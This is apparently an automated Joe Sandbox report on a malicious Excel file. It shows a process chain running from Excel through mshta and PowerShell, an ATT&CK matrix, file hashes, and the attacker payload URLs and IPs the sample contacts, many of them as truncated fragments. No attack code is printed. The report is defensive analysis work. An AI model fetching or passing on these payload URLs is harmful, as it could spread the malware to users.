Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (one tactic per column; digits in front of a technique name are the report's signature-count badges for that cell):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 121 Scripting | Valid Accounts | 221 Command and Scripting Interpreter | 121 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 21 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 4 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Install Root Certificate | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph ID: 1564317 | Sample: Swiftcopy.xla.xlsx | Start date: 28/11/2024 | Architecture: WINDOWS | Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 17 other signatures.

Process tree (numbers after a process name are the graph's per-node counters as shown in the report):

• EXCEL.EXE (31 28) started
  • Network: 172.245.123.29, ports 49164, 49166, 49167, AS-COLOCROSSINGUS, United States; ljg.cl 152.231.117.86, port 443 (local ports 49163, 49165), ENTELCHILESACL, Chile
  • Dropped: C:\Users\user\Desktop\~$Swiftcopy.xla.xlsx (data); C:\Users\user\...\seemebestthings[1].hta (HTML)
  • Signature: Microsoft Office drops suspicious files
  • mshta.exe (10) started
    • DNS: ljg.cl
    • Signatures: Suspicious command line found; PowerShell case anomaly found
    • cmd.exe started
      • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
      • powershell.exe (24) started
        • Dropped: seemebestthingswit...reatnaturething.vbS (Unicode); C:\Users\user\AppData\...\rpgvm2d4.cmdline (Unicode)
        • Signatures: Suspicious powershell command line found; Obfuscated command line found; Installs new ROOT certificates
        • wscript.exe (1) started
          • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
          • powershell.exe (4) started
            • Signatures: Suspicious powershell command line found; Obfuscated command line found
            • powershell.exe (12 4) started
              • Network: ip.3105.filemail.com 193.30.119.205, port 443 (local port 49168), DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, unknown; 3105.filemail.com
        • csc.exe (2) started
          • Dropped: C:\Users\user\AppData\Local\...\rpgvm2d4.dll (PE32)
          • cvtres.exe started

Source | Detection | Scanner | Label
Swiftcopy.xla.xlsx | 15% | Virustotal |
Swiftcopy.xla.xlsx | 16% | ReversingLabs |
Swiftcopy.xla.xlsx | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
http://172.245.123.29/1343/erg/seemebestthings.htahttp://172.245.123.29/1343/erg/seemebestthings.hta | 0% | Avira URL Cloud | safe
http://crl.entrz | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/erg/seemebestthings.htas=drunk&kettledrum=flippant& | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFGf | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/erg/seemebestthings.hta | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/erg/seemebestthings.htarracks=drunk&kettledrum=flippant&banana=loose&bath | 0% | Avira URL Cloud | safe
https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFp | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/erg/seemebestthings.hta...A | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/erg/seemebestthings.htab | 0% | Avira URL Cloud | safe
https://ljg.cl/P | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFHf | 0% | Avira URL Cloud | safe
http://172.245.123.29/ | 0% | Avira URL Cloud | safe
https://ljg.cl/w | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/seeme | 0% | Avira URL Cloud | safe
https://ljg.cl/ersiM | 0% | Avira URL Cloud | safe
https://ljg.cl/ | 0% | Avira URL Cloud | safe
https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bat | 0% | Avira URL Cloud | safe
http://172.245.123.29/1343/erg/seemebestthings.htai | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip.3105.filemail.com | 193.30.119.205 | true | false | | high
ljg.cl | 152.231.117.86 | true | false | | high
3105.filemail.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://172.245.123.29/1343/erg/seemebestthings.hta | true | Avira URL Cloud: safe | unknown
https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom | false | Avira URL Cloud: safe | unknown
http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF | true | Avira URL Cloud: safe | unknown
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
              https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://172.245.123.29/1343/erg/seemebestthings.htahttp://172.245.123.29/1343/erg/seemebestthings.htamshta.exe, 00000004.00000003.500717687.0000000003515000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://crl.entrzpowershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.entrust.net03mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://172.245.123.29/1343/erg/seemebestthings.htas=drunk&kettledrum=flippant&mshta.exe, 00000004.00000002.501048315.00000000003E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.00000000003E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFGfpowershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://172.245.123.29/1343/erg/seemebestthings.htarracks=drunk&kettledrum=flippant&banana=loose&bathmshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.000000000037E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://go.microspowershell.exe, 00000008.00000002.519013010.0000000002953000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFppowershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://172.245.123.29/1343/erg/seemebestthings.hta...Amshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://172.245.123.29/1343/erg/seemebestthings.htabmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ljg.cl/Pmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.528236429.0000000012461000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFHfpowershell.exe, 00000008.00000002.528531884.000000001AA9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://172.245.123.29/mshta.exe, 00000004.00000003.500943602.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.0000000004433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.0000000004433000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ljg.cl/wmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://172.245.123.29/1343/seemepowershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ljg.cl/ersiMmshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ljg.cl/mshta.exe, 00000004.00000002.501048315.0000000000423000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.0000000000423000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&batmshta.exe, 00000004.00000002.501048315.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500300099.000000000040B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501030236.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, Swiftcopy.xla.xlsx, 73B30000.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AD05000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.519013010.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.538964399.000000000240B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.533779674.00000000023C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536446147.000000001AC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.536967212.000000001C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://go.crpowershell.exe, 0000000F.00000002.536446147.000000001AC84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://172.245.123.29/1343/erg/seemebestthings.htaimshta.exe, 00000004.00000003.500943602.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.499881284.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.500026832.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.501200566.00000000043E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://3105.filemail.compowershell.exe, 0000000F.00000002.533779674.00000000025C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
193.30.119.205 | ip.3105.filemail.com | unknown | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | false
172.245.123.29 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
152.231.117.86 | ljg.cl | Chile | 27651 | ENTELCHILESACL | false
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1564317
                                                  Start date and time:2024-11-28 07:26:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 51s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • GSI enabled (VBA)
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Swiftcopy.xla.xlsx
                                                  Detection:MAL
                                                  Classification:mal100.phis.expl.evad.winXLSX@16/29@6/3
                                                  EGA Information:
                                                  • Successful, ratio: 33.3%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 22
                                                  • Number of non-executed functions: 1
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .xlsx
                                                  • Changed system and user locale, location and keyboard layout to French - France
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Active ActiveX Object
                                                  • Active ActiveX Object
                                                  • Scroll down
                                                  • Close Viewer
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 3948 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2036 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:28:04 | API Interceptor | 97x Sleep call for process: mshta.exe modified
01:28:11 | API Interceptor | 161x Sleep call for process: powershell.exe modified
01:28:20 | API Interceptor | 15x Sleep call for process: wscript.exe modified
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):15189
                                                                      Entropy (8bit):5.0343247648743
                                                                      Encrypted:false
                                                                      SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                      MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                      SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                      SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                      SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:modified
                                                                      Size (bytes):204989
                                                                      Entropy (8bit):2.0035970583268288
                                                                      Encrypted:false
                                                                      SSDEEP:1536:RZ7yLk8TCV/QtwkHTCV/Qta9LiBPxBfOrXa9zDzFzDzbfQP/OkOk0TCV/QtOky:RV
                                                                      MD5:B89E0D07BAC575AA9381611FA00EA4A0
                                                                      SHA1:53A71EFFB8401E97F8E8E1F2522A0289E2B58745
                                                                      SHA-256:6BFA3B21293AD79037E13886FD6B0B3C0EE8AFDC1422BA2748ADE815DB010AA7
                                                                      SHA-512:825A4C2A185A039B92CC5BABF6797E6BDE8FFFE64B2F04DE45D20F85471C5F8A2C2C2DDE476B7C4E85029D21B2A291A3A70DCAAD76563AAD5E98D29BAC9DD644
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta, Author: Joe Security
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (429), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):166446
                                                                      Entropy (8bit):3.894631434751547
                                                                      Encrypted:false
                                                                      SSDEEP:3072:zPTYr5SAsQ5NIUHFlPTYr5SAsQ5NIUH5PTYr5SAsQ5NIUH2:zPTs5SANIUllPTs5SANIUZPTs5SANIUW
                                                                      MD5:33ACA5E4AA52362C54EA2A709581C47B
                                                                      SHA1:5FE650034F1FBE7C15477ECD16D2E95D14505C4A
                                                                      SHA-256:832FCD0838977003D89333EC7A0EAE20E9B00BB5DA21047F93FBECC793B2A03E
                                                                      SHA-512:64AA6372746DCD76178A0759CB12C95F31F31B748D8403CF7083512C6F606B065B78850EAED6BBECFCB7FCF1DE6C32A8B6CF5D620B0969E554A2378F6A2F3F61
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):2351842
                                                                      Entropy (8bit):3.465507143020907
                                                                      Encrypted:false
                                                                      SSDEEP:6144:+22B22B22t22J22J22J22622V22u22822Rwi7v2t22W2922O2O22r2r22422e22f:hsUfJ444Tg0g0gNsUfJ444Tg0g0gM
